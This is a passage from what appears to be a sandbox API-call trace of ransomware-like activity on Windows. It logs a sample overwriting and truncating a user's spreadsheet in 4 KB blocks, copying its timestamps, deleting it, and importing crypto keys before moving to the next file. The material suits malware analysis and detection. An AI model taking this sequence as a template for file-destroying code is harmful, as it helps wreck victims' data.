lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x840, lpOverlapped=0x0) returned 1 [0075.564] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.564] CloseHandle (hObject=0x36c) returned 1 [0075.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F.info", lpFilePart=0x0) returned 0x4d [0075.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.582] GetFileType (hFile=0x36c) returned 0x1 [0075.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.582] GetFileType (hFile=0x36c) returned 0x1 [0075.582] WriteFile (in: hFile=0x36c, lpBuffer=0x2298818*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2298818*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.583] CloseHandle (hObject=0x36c) returned 1 [0075.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba233bc0, ftCreationTime.dwHighDateTime=0x1d4d0bb, ftLastAccessTime.dwLowDateTime=0x7f5fd4a0, ftLastAccessTime.dwHighDateTime=0x1d4faad, ftLastWriteTime.dwLowDateTime=0x7f5fd4a0, ftLastWriteTime.dwHighDateTime=0x1d4faad, nFileSizeHigh=0x0, nFileSizeLow=0x1583e)) returned 1 [0075.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.585] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", dwFileAttributes=0x80) returned 1 [0075.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x22a0400 | out: lpFileInformation=0x22a0400*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xba233bc0, ftCreationTime.dwHighDateTime=0x1d4d0bb, ftLastAccessTime.dwLowDateTime=0x7f5fd4a0, ftLastAccessTime.dwHighDateTime=0x1d4faad, ftLastWriteTime.dwLowDateTime=0x7f5fd4a0, ftLastWriteTime.dwHighDateTime=0x1d4faad, nFileSizeHigh=0x0, nFileSizeLow=0x1583e)) returned 1 [0075.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.585] GetFileType (hFile=0x36c) returned 0x1 [0075.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.585] GetFileType (hFile=0x36c) returned 0x1 [0075.585] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.586] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.587] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.588] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.588] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.589] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.590] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.591] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.592] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.592] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.593] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.594] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.595] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.595] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.596] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.597] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.598] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.599] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.600] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.600] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.601] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.602] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.602] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0075.602] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.603] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.604] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.605] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.605] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.606] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.607] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.608] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.608] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.609] WriteFile (in: hFile=0x36c, lpBuffer=0x22a0888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22a0888*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.610] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.611] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.611] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.611] SetEndOfFile (hFile=0x36c) returned 1 [0075.643] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.644] CloseHandle (hObject=0x36c) returned 1 [0075.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.644] GetFileType (hFile=0x36c) returned 0x1 [0075.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.644] GetFileType (hFile=0x36c) returned 0x1 [0075.644] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.644] CloseHandle (hObject=0x36c) returned 1 [0075.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.645] GetFileType (hFile=0x36c) returned 0x1 [0075.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.645] GetFileType (hFile=0x36c) returned 0x1 [0075.645] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.645] CloseHandle (hObject=0x36c) returned 1 [0075.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.645] GetFileType (hFile=0x36c) returned 0x1 [0075.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.645] GetFileType (hFile=0x36c) returned 0x1 [0075.645] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.645] CloseHandle (hObject=0x36c) returned 1 [0075.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.646] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx")) returned 1 [0075.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", lpFilePart=0x0) returned 0x48 [0075.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.647] GetFileType (hFile=0x36c) returned 0x1 [0075.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.647] GetFileType (hFile=0x36c) returned 0x1 [0075.647] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.647] CloseHandle (hObject=0x36c) returned 1 [0075.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", lpFilePart=0x0) returned 0x48 [0075.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.647] GetFileType (hFile=0x36c) returned 0x1 [0075.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.647] GetFileType (hFile=0x36c) returned 0x1 [0075.647] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.647] CloseHandle (hObject=0x36c) returned 1 [0075.647] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", lpFilePart=0x0) returned 0x48 [0075.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.648] GetFileType (hFile=0x36c) returned 0x1 [0075.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.648] GetFileType (hFile=0x36c) returned 0x1 [0075.648] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.648] CloseHandle (hObject=0x36c) returned 1 [0075.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.649] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x22a3c30, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.649] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.649] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.649] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22a3d20, pdwDataLen=0x1bf5db30 | out: pbData=0x22a3d20*, 